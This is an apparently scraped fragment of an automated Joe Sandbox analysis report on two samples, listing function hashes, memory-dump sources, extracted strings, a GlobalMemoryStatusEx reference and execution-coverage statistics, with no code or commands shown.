                                                                • Opcode ID: 5d7c00af9b1f93a9143eeb08f1ffcd78f1af5b3778433a8570773adc59779433
                                                                • Instruction ID: 55de41b32677c0167a48c0bb6a4aa6d0d11a2262b1cc4ca51760adea0077a6d3
                                                                • Opcode Fuzzy Hash: 5d7c00af9b1f93a9143eeb08f1ffcd78f1af5b3778433a8570773adc59779433
                                                                • Instruction Fuzzy Hash: B821B2767400108FCB55DB78E8848AAB7F5EF88B1031584FBE80ECB372E625DC428B51
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1727443931.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_bd0000_docdd.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: bd421252383a1e8b3390ea70cbc3d0fec2cdaef2f18bf4f91d10dd67e9f37e58
                                                                • Instruction ID: 2090659547236ff42d48f90a1a639401b0a033f4e591581282ec23d3e2be92dc
                                                                • Opcode Fuzzy Hash: bd421252383a1e8b3390ea70cbc3d0fec2cdaef2f18bf4f91d10dd67e9f37e58
                                                                • Instruction Fuzzy Hash: BE41CC31B002498FDB18AF35D95466EB7E2FBD9700B24C9ABC1098B388EE709D428791
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1727443931.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_bd0000_docdd.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 2f627c7806e50706623c48e1fc4d0551b62cac3f6e7930c6087c7cd94c40964b
                                                                • Instruction ID: 9a79f09cd0d9ec724eb2babcf659ec0d57b653ebf2caddb5247a3bf08e94b93d
                                                                • Opcode Fuzzy Hash: 2f627c7806e50706623c48e1fc4d0551b62cac3f6e7930c6087c7cd94c40964b
                                                                • Instruction Fuzzy Hash: 9721A031B04245CBD718DF35DA5467EB7F1EBA5701F24C9ABC4098B385EAB48C028795
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1727443931.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_bd0000_docdd.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 8ace37ac53b4c3c4fd52680814bede521b0755b1d316946f6b5508138f74b3e9
                                                                • Instruction ID: 5b1c34401bdf5518f1698b5d5bae446157d796b2190fb0df51b4a2d0b16d8f8c
                                                                • Opcode Fuzzy Hash: 8ace37ac53b4c3c4fd52680814bede521b0755b1d316946f6b5508138f74b3e9
                                                                • Instruction Fuzzy Hash: 34315E70A00B058FD774CF6AD94466AB7F1EF84B20B20866DD06A97791E730EA46CB91
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1727443931.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_bd0000_docdd.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: dbd4ce7bbc848570ff700e744b274639768ceef08a36ae20aa9be415e16e4f73
                                                                • Instruction ID: 1cbf92cc2b7db3eb79e55b1aaf00d6a1adf75552e684477076214b5ee32bdb65
                                                                • Opcode Fuzzy Hash: dbd4ce7bbc848570ff700e744b274639768ceef08a36ae20aa9be415e16e4f73
                                                                • Instruction Fuzzy Hash: 7E3115B0D002589FCB14CFAAC580ADEFFF5AF48304F24846AE559AB350DB349945CFA4
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1727443931.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_bd0000_docdd.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: c09b65dd7125399aef61da43cdd6e303bf04f49cd65cc552df453212f206fd39
                                                                • Instruction ID: db55d00dc0d6703ccde68d646f58c99fe2149d891fa7cca31202825775119646
                                                                • Opcode Fuzzy Hash: c09b65dd7125399aef61da43cdd6e303bf04f49cd65cc552df453212f206fd39
                                                                • Instruction Fuzzy Hash: E33114B0D002599FDB14CFAAC580ADEFFF2AF48344F24846AE559AB350DB349945CF90
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1727443931.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_bd0000_docdd.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 90252d928f1219ef3db62583c0225f51d05ca23d7340e00e5d46ea9751a15fa3
                                                                • Instruction ID: f2812dd3558c78dac557269a6c7acb19d0862ce6325c488024c14d8d5a0e9a1e
                                                                • Opcode Fuzzy Hash: 90252d928f1219ef3db62583c0225f51d05ca23d7340e00e5d46ea9751a15fa3
                                                                • Instruction Fuzzy Hash: 5021B431B102458FCB04B7B4C4693ADBBF2AFC9315F54496DD406AB390EF758D468B92
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1727082690.0000000000A6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A6D000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_a6d000_docdd.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 0cc0b8326268e15dfa45f2eac53ae9da4202a8a4b087dc9075b064053d5aeea5
                                                                • Instruction ID: e8c9cb3aaf0e5dddf190c606285e6e7b78130da2378dba94d1d8698283b0118e

Execution Graph

Execution Coverage: 14%
Dynamic/Decrypted Code Coverage: 100%
Signature Coverage: 0%
Total number of Nodes: 29
Total number of Limit Nodes: 6


                                                                • Instruction Fuzzy Hash: 532291B0E102099FEF64DB68D5A07EDB7B2FB49310F219865E809EB391DA35DC81CB51

                                                                Control-flow Graph (legend: Executed / Not Executed; graph not preserved)
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2947662464.0000000006B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_6b50000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                • API String ID: 0-3823777903
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2947662464.0000000006B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_6b50000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: $^q$$^q$$^q$$^q$$^q$$^q
                                                                • API String ID: 0-2392861976

                                                                Control-flow Graph (legend: Executed / Not Executed; graph not preserved)
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2947662464.0000000006B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_6b50000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: $^q$$^q$$^q$$^q
                                                                • API String ID: 0-2125118731

                                                                Control-flow Graph (legend: Executed / Not Executed; graph not preserved)
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2947662464.0000000006B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_6b50000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: $^q$$^q$$^q
                                                                • API String ID: 0-831282457

                                                                Control-flow Graph (legend: Executed / Not Executed; graph not preserved)
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2947662464.0000000006B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_6b50000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: fcq$XPcq$\Ocq
                                                                • API String ID: 0-3575482020

                                                                Control-flow Graph (legend: Executed / Not Executed; graph not preserved)
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2947662464.0000000006B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_6b50000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: $^q$$^q
                                                                • API String ID: 0-355816377

                                                                Control-flow Graph (legend: Executed / Not Executed; graph not preserved)
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2947662464.0000000006B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_6b50000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: fcq$XPcq
                                                                • API String ID: 0-936005338

                                                                Control-flow Graph (legend: Executed / Not Executed; graph not preserved; contains a GlobalMemoryStatusEx node)
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2918236224.00000000012C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012C0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_12c0000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:

                                                                Control-flow Graph (legend: Executed / Not Executed; graph not preserved; contains a GlobalMemoryStatusEx node)
                                                                APIs
                                                                • GlobalMemoryStatusEx.KERNELBASE ref: 012CEAEF
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2918236224.00000000012C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012C0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_12c0000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID: GlobalMemoryStatus
                                                                • String ID:
                                                                • API String ID: 1890195054-0

                                                                Control-flow Graph (legend: Executed / Not Executed; graph not preserved)
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2947662464.0000000006B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_6b50000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: PH^q
                                                                • API String ID: 0-2549759414
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2947662464.0000000006B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_6b50000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: PH^q
                                                                • API String ID: 0-2549759414
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2947662464.0000000006B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_6b50000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: PH^q
                                                                • API String ID: 0-2549759414
                                                                • Opcode ID: 62972b7a0322f66963dee30afcd1cc6b5972b291f4126d6edeb538308baeb5b6
                                                                • Instruction ID: 92afcd43fbd79d19f9674e16a56568c800ebc550caae470e2c8283cf177539e1
                                                                • Opcode Fuzzy Hash: 62972b7a0322f66963dee30afcd1cc6b5972b291f4126d6edeb538308baeb5b6
                                                                • Instruction Fuzzy Hash: E531E570B002058FDB699B74D5547AF77E3EF88200F105468D806DB394DE79DE4ACBA5
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2947662464.0000000006B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_6b50000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: PH^q
                                                                • API String ID: 0-2549759414
                                                                • Opcode ID: 96d736e12b2cd6cb9b7a1fb930428a9c138a54e1cce9d6df8027c4df0ee4bd21
                                                                • Instruction ID: 5b2166d4ce8ff808c27e36138bb53ebc48a7defcb0a40390b8d1318176ff9ebe
                                                                • Opcode Fuzzy Hash: 96d736e12b2cd6cb9b7a1fb930428a9c138a54e1cce9d6df8027c4df0ee4bd21
                                                                • Instruction Fuzzy Hash: 54310370B112058FDB699B30D5543AF77A3EF88200F1154A9D806DB384DF79DE4ACBA5
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2947662464.0000000006B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_6b50000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: PH^q
                                                                • API String ID: 0-2549759414
                                                                • Opcode ID: 2507cfded46b61cc7f73c7a2990b82020233ad795d9f68013c987f8a688500f6
                                                                • Instruction ID: 0af8dc55c02b9cd1ef73aa2788b433d39a095be38f8fd69d0ccf310373222999
                                                                • Opcode Fuzzy Hash: 2507cfded46b61cc7f73c7a2990b82020233ad795d9f68013c987f8a688500f6
                                                                • Instruction Fuzzy Hash: EE310370B102058FDB699B30D5543AF77A3EF88200F1058A8D806DB384DE39DE4ACBA5
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2947662464.0000000006B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_6b50000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: PH^q
                                                                • API String ID: 0-2549759414
                                                                • Opcode ID: 6e1330eabf2848f7975f3e07bc54430a6e6f9c8fc14fdb65d3a37b72e5801986
                                                                • Instruction ID: 590c28fb2a331b64362cfecc7233248a6df0645e8b1c17dd88f7c13264737ed1
                                                                • Opcode Fuzzy Hash: 6e1330eabf2848f7975f3e07bc54430a6e6f9c8fc14fdb65d3a37b72e5801986
                                                                • Instruction Fuzzy Hash: 73310330B002058FDB699B30D5543AE7BE3EF88200F1054A8D806DB384EE79DE4ACBA5
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2947662464.0000000006B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_6b50000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: $^q
                                                                • API String ID: 0-388095546
                                                                • Opcode ID: 7c6c9e5b8203994d30b78f1c7f4e16ca8520a2a20a533486af7cf3e419e2be1e
                                                                • Instruction ID: cd78b68f6ddd1697d037f0afa8856715284f12bab7156e3d815480e6523e385f
                                                                • Opcode Fuzzy Hash: 7c6c9e5b8203994d30b78f1c7f4e16ca8520a2a20a533486af7cf3e419e2be1e
                                                                • Instruction Fuzzy Hash: AEF0FFB5A04225CFDF789E45E9917FC73A6EB40300F0244B6ED06CB254CB31D906C790
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2947662464.0000000006B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_6b50000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: c64edacc1d3bf54c40e27777d9b6433d1f519502808a3ace0417c877045b27df
                                                                • Instruction ID: ababf51c0d99c0ba70228869e1aa171db8a707b3381b0cb664e5b314fa81ad2f
                                                                • Opcode Fuzzy Hash: c64edacc1d3bf54c40e27777d9b6433d1f519502808a3ace0417c877045b27df
                                                                • Instruction Fuzzy Hash: C7817C70B002098FDF54DFB9D4507AEB7F2AF89304F1185A9D80ADB395EA34DC868B91
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2947662464.0000000006B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_6b50000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 4a6f71801a84bdaac85d961a6279ffa40fbfd573ec440bd5f0a4c0790fcf54d4
                                                                • Instruction ID: d40dd5d800e109585205aab91c1e3e67c6e69fd734969cd83e358be169a4c11c
                                                                • Opcode Fuzzy Hash: 4a6f71801a84bdaac85d961a6279ffa40fbfd573ec440bd5f0a4c0790fcf54d4
                                                                • Instruction Fuzzy Hash: 8161C1B1F001214FCB549A7EC8846AFBAD7EFC4620B564479D80EDB364EE66DD0287C6
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2947662464.0000000006B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_6b50000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 4bc4551bede21c08843e5b89136b9b253ea4777d63537b8d9d5b5c0775bc67a9
                                                                • Instruction ID: 43f5e51365d280e49b7734db288fd0bba6ecb875b801819505cf3beae7b8b140
                                                                • Opcode Fuzzy Hash: 4bc4551bede21c08843e5b89136b9b253ea4777d63537b8d9d5b5c0775bc67a9
                                                                • Instruction Fuzzy Hash: 4B913B70E102198FDF60DF68C990BDDB7B1FF89300F208699D549AB295DB70AA85CF91
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2947662464.0000000006B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_6b50000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 7acbca55b0491cb1cc1aece246d2c5d14af59857d8fa37863be6ac8805597583
                                                                • Instruction ID: 7e2cf6b30e2be82d9e5a2ddc4d085bffea68bf3ddf96150bf38ee3b77fb5e9a6
                                                                • Opcode Fuzzy Hash: 7acbca55b0491cb1cc1aece246d2c5d14af59857d8fa37863be6ac8805597583
                                                                • Instruction Fuzzy Hash: 77913C70E106198FDF60DF68C880BDDB7B1FF89300F208699D549AB255DB70AA85CF91
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2947662464.0000000006B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_6b50000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 7eaa41618bc9dab56b5809f1721a2b64d52d9ae172ea021e01995fa87268dd6c
                                                                • Instruction ID: b2d6c8d9593599bc33aa7c8fcc18433b7fa021de0847eee550489f0da6f16b9c
                                                                • Opcode Fuzzy Hash: 7eaa41618bc9dab56b5809f1721a2b64d52d9ae172ea021e01995fa87268dd6c
                                                                • Instruction Fuzzy Hash: 9F713870A002199FCB54EBA9D980AEEBBF6FF88300F158569D419EB354DB30E946CB50
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2947662464.0000000006B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_6b50000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: a378bb14bd29d017f85d6aef006c7b05d1ddb30786174ce7e2c25c871429fc3f
                                                                • Instruction ID: fdaa673512fe4a915605249031a138dcb2baf074dd8956d404f42763ead4cb6c
                                                                • Opcode Fuzzy Hash: a378bb14bd29d017f85d6aef006c7b05d1ddb30786174ce7e2c25c871429fc3f
                                                                • Instruction Fuzzy Hash: 51712A70A002199FDB54EFA9D980AAEBBF6FF88300F158569D415EB358DB30ED46CB50
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2947662464.0000000006B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_6b50000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 3c04840b0f49b9e9b071dae131b97803998db153b01cd5be6848371647a58fcb
                                                                • Instruction ID: 1d3dbe44faad7e788352f86f467658f51c2b0d62c4c061060fb5b5c85ca7c965
                                                                • Opcode Fuzzy Hash: 3c04840b0f49b9e9b071dae131b97803998db153b01cd5be6848371647a58fcb
                                                                • Instruction Fuzzy Hash: 7351CEB1E112059FCB24EFB8E4446FDFBB6EF89310F1148A9E506D7290DB358855CB81
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2947662464.0000000006B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_6b50000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: ef9b127d3db59c9763f6fa48ce8e4bca184d93a1949398b9a98ad43cd51b007b
                                                                • Instruction ID: ea721813361c730413e7a3f76c61d8ec9f7445c67bb40e936795ade205c031f7
                                                                • Opcode Fuzzy Hash: ef9b127d3db59c9763f6fa48ce8e4bca184d93a1949398b9a98ad43cd51b007b
                                                                • Instruction Fuzzy Hash: E4512870B20214DFEF60666CDD547BF665FD789300F20097AE90AD3799CA29CC858BA2
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2947662464.0000000006B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_6b50000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: ba04ae3de87adfe79cba7c44bd7dde63052e704f1a8a96127ca6affba9a385ee
                                                                • Instruction ID: 95d81d4f2e66f88e807b59c695b0328e1b2782498fe57c4c2db3456b0609ce7d
                                                                • Opcode Fuzzy Hash: ba04ae3de87adfe79cba7c44bd7dde63052e704f1a8a96127ca6affba9a385ee
                                                                • Instruction Fuzzy Hash: D2512970B20218DFEF60666CD9547BF665FD789300F20097AE90AD3799CA39CC858B92
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2947662464.0000000006B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_6b50000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: d047fff5c351e00882a190ba1c27d41fd6d403049b82c37ecc14ec029809ccd1
                                                                • Instruction ID: 3c3293d1fb0010d1fa76ebdedf5448f5a53d3db5bd055b61fadb553778702116
                                                                • Opcode Fuzzy Hash: d047fff5c351e00882a190ba1c27d41fd6d403049b82c37ecc14ec029809ccd1
                                                                • Instruction Fuzzy Hash: 9D417BB2E006098FCB70CFA9D880BAFF7B2EB84311F10496AD616D7654D330E9558B91
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2947662464.0000000006B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_6b50000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 278928a30ac51db8cf62ec9b40ec54be955094f0f3329cc760d2f226f1a36572
                                                                • Instruction ID: f5989d88ac12578c0f4c5d1ab407d0fc98002074be08a3d2b2b1a4fd4fc49f6d
                                                                • Opcode Fuzzy Hash: 278928a30ac51db8cf62ec9b40ec54be955094f0f3329cc760d2f226f1a36572
                                                                • Instruction Fuzzy Hash: 1131AB75E102159BDB49CFA4D844AAEB7B6EF88300F118519E80AA7350EB71AE46CB80
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2947662464.0000000006B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_6b50000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 33ffaaac866cc4978111e9738a19c4ddb996ad6a8290b41b636522eb854d4c47
                                                                • Instruction ID: 9e3b5e0c90c29c92d0b5ba99b8486fc5c2ce47e37581c8aa3ba37e31f100f30d
                                                                • Opcode Fuzzy Hash: 33ffaaac866cc4978111e9738a19c4ddb996ad6a8290b41b636522eb854d4c47
                                                                • Instruction Fuzzy Hash: A531AB75E102159BDB49CFA5D854B9EB7B2FF88300F158519EC06E7350EB71AD46CB80
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2947662464.0000000006B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_6b50000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 1adb130354d73d769707a782fe0d6998c826165a22c7fddbab04763cd71f24e7
                                                                • Instruction ID: 54350a4adde0d9444a8bfbbff07ee486ddd2b5c5df5f571412db608e44bc3873
                                                                • Opcode Fuzzy Hash: 1adb130354d73d769707a782fe0d6998c826165a22c7fddbab04763cd71f24e7
                                                                • Instruction Fuzzy Hash: 8D31AC75E102199BDB49CFA5D854A9EB7F6FF89300F148529EC06E7340EB71AD46CB80
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2947662464.0000000006B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_6b50000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: e05f9ee020384f6004ec1413d005ef61ea97de0cd057a68dc5eaaf6150ae08d2
                                                                • Instruction ID: cfb357e433aebe6df6cd5641a1bebf445b7796bf61e328918fdbfeae0684222b
                                                                • Opcode Fuzzy Hash: e05f9ee020384f6004ec1413d005ef61ea97de0cd057a68dc5eaaf6150ae08d2
                                                                • Instruction Fuzzy Hash: 80319A75E102199BDB49DFA5D854A9EB7F2FF89300F148529EC06EB340EB71AD46CB80
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2947662464.0000000006B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_6b50000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 9dc7463c7ca3e1b2213176e56b6026bedc0496ed955de2991265974631386e62
                                                                • Instruction ID: a4e89b6007bde43ef224a19a00df3594c704dcb6b9bf6852e4e6cbfa21cd10aa
                                                                • Opcode Fuzzy Hash: 9dc7463c7ca3e1b2213176e56b6026bedc0496ed955de2991265974631386e62
                                                                • Instruction Fuzzy Hash: 3C319A75E202159BDB49CFA5D854A9EB7B2FF88300F158529EC06E7350EB71AD46CB80
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2947662464.0000000006B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_6b50000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 5cbbebd0111d4c30626a8d814cf1f113a397f198479acfc5ff47df34707a257d
                                                                • Instruction ID: d30466afe4933474877d7c51fe98221f0089d1c49f771bb1ef18c29de4926692
                                                                • Opcode Fuzzy Hash: 5cbbebd0111d4c30626a8d814cf1f113a397f198479acfc5ff47df34707a257d
                                                                • Instruction Fuzzy Hash: 8221BAB5E00219AFDB01DF79D880BEEBBF6EB48750F008065E905E7384E730E9428B95
                                                                Memory Dump Source

                                                                Execution Graph

                                                                Execution Coverage:15.4%
                                                                Dynamic/Decrypted Code Coverage:99.2%
                                                                Signature Coverage:0%
                                                                Total number of Nodes:354
                                                                Total number of Limit Nodes:20

                                                                Strings
                                                                Memory Dump Source
